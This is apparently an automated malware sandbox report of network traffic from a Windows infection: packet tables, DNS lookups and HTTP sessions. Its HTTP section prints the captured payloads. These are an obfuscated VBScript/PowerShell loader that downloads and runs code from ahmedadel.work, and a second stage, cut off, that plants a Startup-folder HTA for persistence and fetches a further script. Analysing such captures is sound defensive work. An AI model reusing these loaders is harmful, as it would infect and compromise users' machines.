                                                              Feb 27, 2021 19:18:22.107965946 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108004093 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108005047 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.108052969 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108092070 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.108094931 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108134031 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108170986 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.108172894 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108211994 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108248949 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108247995 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.108287096 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108324051 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108335972 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.108372927 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108409882 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.108416080 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108455896 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108491898 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.108494997 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108534098 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108571053 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108588934 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.108609915 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108634949 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.108647108 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108695984 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108711958 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.108741045 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108778954 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108817101 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108829021 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.108855009 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108875990 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.108894110 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108932018 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.108968973 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.109005928 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.109015942 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.109060049 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.109080076 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.109097958 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.109126091 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.109137058 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.109175920 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.109213114 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.109217882 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.109252930 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.109287977 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.109289885 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.109390974 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.156676054 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.156718969 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.156802893 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.182998896 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.183054924 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.183092117 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.183129072 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.183132887 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.183171034 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.183177948 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.183221102 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.183263063 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.183274031 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:22.183295965 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:22.183370113 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:27.038049936 CET8049721212.64.222.172192.168.2.4
                                                              Feb 27, 2021 19:18:27.038253069 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:18:39.274830103 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:39.331427097 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:18:39.331532001 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:39.387257099 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:39.460581064 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:18:39.460616112 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:18:39.460695982 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:39.467335939 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:39.527411938 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:18:39.577558041 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:42.635688066 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:42.732952118 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:18:42.733083010 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:42.829991102 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:18:54.358736992 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:54.455893040 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:18:54.459162951 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:54.516571999 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:18:54.570653915 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:54.628478050 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:18:54.671900034 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:54.846848011 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:54.942944050 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:18:54.943037987 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:55.039072037 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:18:57.508256912 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:18:57.562798977 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:18:57.620819092 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:18:57.672173977 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:05.881107092 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:05.977983952 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:05.978168964 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:06.035717010 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:06.079149008 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:06.135289907 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:06.188462973 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:06.215171099 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:06.312786102 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:06.313237906 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:06.410816908 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:17.319277048 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:17.415915012 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:17.416207075 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:17.475191116 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:17.517607927 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:17.574299097 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:17.626949072 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:17.630496979 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:17.726949930 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:17.727308035 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:17.823947906 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:27.508063078 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:27.555572987 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:27.611888885 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:27.658931017 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:28.782193899 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:28.879925013 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:28.880305052 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:28.938060045 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:28.987281084 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:29.043603897 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:29.096914053 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:29.099689007 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:29.196899891 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:29.197065115 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:29.293797970 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:40.262342930 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:40.358700037 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:40.361057997 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:40.418344021 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:40.472434998 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:40.528841019 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:40.581787109 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:40.710248947 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:40.807712078 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:40.807905912 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:40.906759977 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:51.767956018 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:51.864626884 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:51.868057966 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:51.925272942 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:51.973448992 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:52.029681921 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:52.077583075 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:52.174513102 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:52.174890041 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:52.271750927 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:54.617650032 CET49715443192.168.2.4207.241.228.153
                                                              Feb 27, 2021 19:19:57.505597115 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:57.552081108 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:19:57.608386040 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:19:57.661479950 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:20:02.224596024 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:20:02.536655903 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:20:03.146210909 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:20:03.260411024 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:20:03.356833935 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:20:03.357135057 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:20:03.414704084 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:20:03.458739042 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:20:03.515002966 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:20:03.550787926 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:20:03.646524906 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:20:03.647007942 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:20:03.742614985 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:20:04.349339962 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:20:06.755719900 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:20:11.569102049 CET4972180192.168.2.4212.64.222.172
                                                              Feb 27, 2021 19:20:14.699502945 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:20:14.795550108 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:20:14.795671940 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:20:14.853321075 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:20:14.897001028 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:20:14.953342915 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:20:15.006423950 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:20:15.025710106 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:20:15.125591040 CET666649725193.23.3.13192.168.2.4
                                                              Feb 27, 2021 19:20:15.125842094 CET497256666192.168.2.4193.23.3.13
                                                              Feb 27, 2021 19:20:15.221482038 CET666649725193.23.3.13192.168.2.4

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Feb 27, 2021 19:17:54.911070108 CET5102553192.168.2.48.8.8.8
                                                              Feb 27, 2021 19:17:54.979348898 CET53510258.8.8.8192.168.2.4
                                                              Feb 27, 2021 19:18:01.357744932 CET6151653192.168.2.48.8.8.8
                                                              Feb 27, 2021 19:18:01.406991959 CET53615168.8.8.8192.168.2.4
                                                              Feb 27, 2021 19:18:02.354219913 CET4918253192.168.2.48.8.8.8
                                                              Feb 27, 2021 19:18:02.417057991 CET53491828.8.8.8192.168.2.4
                                                              Feb 27, 2021 19:18:02.569791079 CET5992053192.168.2.48.8.8.8
                                                              Feb 27, 2021 19:18:02.621450901 CET53599208.8.8.8192.168.2.4
                                                              Feb 27, 2021 19:18:04.131393909 CET5745853192.168.2.48.8.8.8
                                                              Feb 27, 2021 19:18:04.183351994 CET53574588.8.8.8192.168.2.4
                                                              Feb 27, 2021 19:18:05.146290064 CET5057953192.168.2.48.8.8.8
                                                              Feb 27, 2021 19:18:05.195327044 CET53505798.8.8.8192.168.2.4
                                                              Feb 27, 2021 19:18:06.022663116 CET5170353192.168.2.48.8.8.8
                                                              Feb 27, 2021 19:18:06.247833014 CET53517038.8.8.8192.168.2.4
                                                              Feb 27, 2021 19:18:06.583969116 CET6524853192.168.2.48.8.8.8
                                                              Feb 27, 2021 19:18:06.632795095 CET53652488.8.8.8192.168.2.4
                                                              Feb 27, 2021 19:18:08.290199995 CET5372353192.168.2.48.8.8.8
                                                              Feb 27, 2021 19:18:08.347462893 CET53537238.8.8.8192.168.2.4
                                                              Feb 27, 2021 19:18:09.299889088 CET6464653192.168.2.48.8.8.8
                                                              Feb 27, 2021 19:18:09.348550081 CET53646468.8.8.8192.168.2.4
                                                              Feb 27, 2021 19:18:12.235332012 CET6529853192.168.2.48.8.8.8
                                                              Feb 27, 2021 19:18:12.284215927 CET53652988.8.8.8192.168.2.4
                                                              Feb 27, 2021 19:18:13.582906008 CET5912353192.168.2.48.8.8.8
                                                              Feb 27, 2021 19:18:13.645466089 CET53591238.8.8.8192.168.2.4
                                                              Feb 27, 2021 19:18:14.261471987 CET5453153192.168.2.48.8.8.8
                                                              Feb 27, 2021 19:18:14.313458920 CET53545318.8.8.8192.168.2.4
                                                              Feb 27, 2021 19:18:15.252944946 CET4971453192.168.2.48.8.8.8
                                                              Feb 27, 2021 19:18:15.301991940 CET53497148.8.8.8192.168.2.4
                                                              Feb 27, 2021 19:18:16.485549927 CET5802853192.168.2.48.8.8.8
                                                              Feb 27, 2021 19:18:16.534528971 CET53580288.8.8.8192.168.2.4
                                                              Feb 27, 2021 19:18:18.977446079 CET5309753192.168.2.48.8.8.8
                                                              Feb 27, 2021 19:18:19.026290894 CET53530978.8.8.8192.168.2.4
                                                              Feb 27, 2021 19:18:20.733107090 CET4925753192.168.2.48.8.8.8
                                                              Feb 27, 2021 19:18:20.782078028 CET53492578.8.8.8192.168.2.4
                                                              Feb 27, 2021 19:18:21.598244905 CET6238953192.168.2.48.8.8.8
                                                              Feb 27, 2021 19:18:21.658826113 CET53623898.8.8.8192.168.2.4
                                                              Feb 27, 2021 19:18:21.893693924 CET4991053192.168.2.48.8.8.8
                                                              Feb 27, 2021 19:18:21.945417881 CET53499108.8.8.8192.168.2.4
                                                              Feb 27, 2021 19:18:23.064929962 CET5585453192.168.2.48.8.8.8
                                                              Feb 27, 2021 19:18:23.117965937 CET53558548.8.8.8192.168.2.4
                                                              Feb 27, 2021 19:18:24.581084013 CET6454953192.168.2.48.8.8.8
                                                              Feb 27, 2021 19:18:24.630065918 CET53645498.8.8.8192.168.2.4
                                                              Feb 27, 2021 19:18:39.088138103 CET6315353192.168.2.48.8.8.8
                                                              Feb 27, 2021 19:18:39.265434027 CET53631538.8.8.8192.168.2.4
                                                              Feb 27, 2021 19:18:40.135756969 CET5299153192.168.2.48.8.8.8
                                                              Feb 27, 2021 19:18:40.184736967 CET53529918.8.8.8192.168.2.4

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                              Feb 27, 2021 19:18:02.354219913 CET192.168.2.48.8.8.80x9d51Standard query (0)ahmedadel.workA (IP address)IN (0x0001)
                                                              Feb 27, 2021 19:18:06.022663116 CET192.168.2.48.8.8.80x85caStandard query (0)ahmedadel.workA (IP address)IN (0x0001)
                                                              Feb 27, 2021 19:18:13.582906008 CET192.168.2.48.8.8.80x7f6Standard query (0)ia801503.us.archive.orgA (IP address)IN (0x0001)
                                                              Feb 27, 2021 19:18:21.598244905 CET192.168.2.48.8.8.80xb423Standard query (0)ahmedadel.workA (IP address)IN (0x0001)
                                                              Feb 27, 2021 19:18:39.088138103 CET192.168.2.48.8.8.80x8cd8Standard query (0)clayroot2016.linkpc.netA (IP address)IN (0x0001)

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                              Feb 27, 2021 19:18:02.417057991 CET8.8.8.8192.168.2.40x9d51No error (0)ahmedadel.work212.64.222.172A (IP address)IN (0x0001)
                                                              Feb 27, 2021 19:18:06.247833014 CET8.8.8.8192.168.2.40x85caNo error (0)ahmedadel.work212.64.222.172A (IP address)IN (0x0001)
                                                              Feb 27, 2021 19:18:13.645466089 CET8.8.8.8192.168.2.40x7f6No error (0)ia801503.us.archive.org207.241.228.153A (IP address)IN (0x0001)
                                                              Feb 27, 2021 19:18:21.658826113 CET8.8.8.8192.168.2.40xb423No error (0)ahmedadel.work212.64.222.172A (IP address)IN (0x0001)
                                                              Feb 27, 2021 19:18:39.265434027 CET8.8.8.8192.168.2.40x8cd8No error (0)clayroot2016.linkpc.net193.23.3.13A (IP address)IN (0x0001)

                                                              HTTP Request Dependency Graph

                                                              • ahmedadel.work

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              0192.168.2.449706212.64.222.17280C:\Windows\System32\mshta.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 27, 2021 19:18:02.509869099 CET328OUTGET /cairo/Encoding.txt HTTP/1.1
                                                              Accept: */*
                                                              Accept-Language: en-US
                                                              UA-CPU: AMD64
                                                              Accept-Encoding: gzip, deflate
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                              Host: ahmedadel.work
                                                              Connection: Keep-Alive
                                                              Feb 27, 2021 19:18:02.587268114 CET329INHTTP/1.1 200 OK
                                                              Date: Sat, 27 Feb 2021 19:00:52 GMT
                                                              Server: Apache
                                                              Last-Modified: Fri, 26 Feb 2021 14:18:10 GMT
                                                              ETag: "247-5bc3df01925b7"
                                                              Accept-Ranges: bytes
                                                              Content-Length: 583
                                                              Keep-Alive: timeout=5, max=100
                                                              Connection: Keep-Alive
                                                              Content-Type: text/plain; charset=UTF-8
                                                              Data Raw: 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 6a 61 76 61 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 27 25 33 43 73 63 72 69 70 74 25 32 30 6c 61 6e 67 75 61 67 65 25 33 44 25 32 32 56 42 53 63 72 69 70 74 25 32 32 25 33 45 25 30 41 46 75 6e 63 74 69 6f 6e 25 32 30 76 61 72 5f 66 75 6e 63 25 32 38 25 32 39 25 30 41 44 69 6d 25 32 30 45 53 52 44 54 59 47 55 48 47 59 54 46 52 48 54 43 4a 56 59 25 30 41 73 65 74 25 32 30 45 53 52 44 54 59 47 55 48 47 59 54 46 52 48 54 43 4a 56 59 25 32 30 25 33 44 25 32 30 43 72 65 61 74 65 4f 62 6a 65 63 74 25 32 38 25 32 32 57 73 63 72 69 70 74 2e 53 68 65 6c 6c 25 32 32 25 32 39 25 30 41 45 53 52 44 54 59 47 55 48 47 59 54 46 52 48 54 43 4a 56 59 2e 72 75 6e 25 32 30 25 32 32 70 6f 77 65 72 73 68 65 6c 6c 25 32 30 25 32 34 63 31 25 33 44 25 32 37 25 32 38 4e 65 77 2d 4f 62 6a 65 63 74 25 32 30 4e 65 74 2e 57 65 25 32 37 25 33 42 25 32 30 25 32 34 63 34 25 33 44 25 32 37 62 43 6c 69 65 6e 74 25 32 39 2e 44 6f 77 6e 6c 6f 25 32 37 25 33 42 25 32 30 25 32 34 63 33 25 33 44 25 32 37 61 64 53 74 72 69 6e 67 25 32 38 25 32 37 25 32 37 68 74 74 70 3a 2f 2f 61 68 6d 65 64 61 64 65 6c 2e 77 6f 72 6b 2f 63 61 69 72 6f 2f 41 4c 4c 2e 74 78 74 25 32 37 25 32 37 25 32 39 25 32 37 25 33 42 25 32 34 54 43 25 33 44 49 25 36 30 45 25 36 30 58 25 32 30 25 32 38 25 32 34 63 31 25 32 43 25 32 34 63 34 25 32 43 25 32 34 63 33 25 32 30 2d 4a 6f 69 6e 25 32 30 25 32 37 25 32 37 25 32 39 25 37 43 49 25 36 30 45 25 36 30 58 25 32 32 25 32 43 30 25 30 41 45 6e 64 25 32 30 46 75 6e 63 74 69 6f 6e 25 30 41 76 61 72 5f 66 75 6e 63 25 30 41 73 65 6c 66 2e 63 6c 6f 73 65 25 30 41 25 33 43 2f 73 63 72 69 70 74 25 33 45 25 30 41 27 29 29 3c 2f 73 63 72 69 70 74 3e
                                                              Data Ascii: <script language=javascript>document.write(unescape('%3Cscript%20language%3D%22VBScript%22%3E%0AFunction%20var_func%28%29%0ADim%20ESRDTYGUHGYTFRHTCJVY%0Aset%20ESRDTYGUHGYTFRHTCJVY%20%3D%20CreateObject%28%22Wscript.Shell%22%29%0AESRDTYGUHGYTFRHTCJVY.run%20%22powershell%20%24c1%3D%27%28New-Object%20Net.We%27%3B%20%24c4%3D%27bClient%29.Downlo%27%3B%20%24c3%3D%27adString%28%27%27http://ahmedadel.work/cairo/ALL.txt%27%27%29%27%3B%24TC%3DI%60E%60X%20%28%24c1%2C%24c4%2C%24c3%20-Join%20%27%27%29%7CI%60E%60X%22%2C0%0AEnd%20Function%0Avar_func%0Aself.close%0A%3C/script%3E%0A'))</script>


                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                              1192.168.2.449710212.64.222.17280C:\Windows\System32\mshta.exe
                                                              TimestampkBytes transferredDirectionData
                                                              Feb 27, 2021 19:18:06.335442066 CET364OUTGET /cairo/ALL.txt HTTP/1.1
                                                              Host: ahmedadel.work
                                                              Connection: Keep-Alive
                                                              Feb 27, 2021 19:18:06.407830000 CET365INHTTP/1.1 200 OK
                                                              Date: Sat, 27 Feb 2021 19:00:55 GMT
                                                              Server: Apache
                                                              Last-Modified: Fri, 26 Feb 2021 14:17:06 GMT
                                                              ETag: "236-5bc3dec4044c9"
                                                              Accept-Ranges: bytes
                                                              Content-Length: 566
                                                              Keep-Alive: timeout=5, max=100
                                                              Connection: Keep-Alive
                                                              Content-Type: text/plain; charset=UTF-8
                                                              Data Raw: 46 75 6e 63 74 69 6f 6e 20 48 42 61 72 0d 0a 7b 0d 0a 24 70 20 3d 20 27 43 3a 5c 55 73 65 72 73 5c 27 20 2b 20 24 65 6e 76 3a 55 73 65 72 4e 61 6d 65 20 2b 20 27 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 53 74 61 72 74 20 4d 65 6e 75 5c 50 72 6f 67 72 61 6d 73 5c 53 74 61 72 74 75 70 5c 27 0d 0a 24 70 73 31 20 3d 20 27 43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 27 0d 0a 0d 0a 0d 0a 73 74 61 72 74 2d 73 6c 65 65 70 20 2d 73 20 37 0d 0a 0d 0a 69 66 28 28 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 29 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 27 68 74 74 70 73 3a 2f 2f 69 61 38 30 31 35 30 33 2e 75 73 2e 61 72 63 68 69 76 65 2e 6f 72 67 2f 31 33 2f 69 74 65 6d 73 2f 73 74 61 72 74 75 70 5f 32 30 32 31 30 32 31 39 2f 53 74 61 72 74 75 70 2e 74 78 74 27 2c 20 24 70 20 2b 20 27 52 75 6e 2e 68 74 61 27 29 29 7b 0d 0a 7d 0d 0a 73 74 61 72 74 2d 73 6c 65 65 70 20 2d 73 20 37 0d 0a 69 66 28 28 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 29 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 27 68 74 74 70 3a 2f 2f 61 68 6d 65 64 61 64 65 6c 2e 77 6f 72 6b 2f 63 61 69 72 6f 2f 53 65 72 76 65 72 2e 74 78 74 27 20 2c 20 24 70 73 31 20 2b 20 27 4d 69 63 72 6f 73 6f 66 74 2e 70 73 31 27 29 29 7b 0d 0a 7d 0d 0a 73 74 61 72 74 2d 73 6c 65 65 70 20 2d 73 20 37 0d 0a 70 6f 77 65 72 73 68 65 6c 6c 20 2d 77 69 6e 64 6f 20 31 20 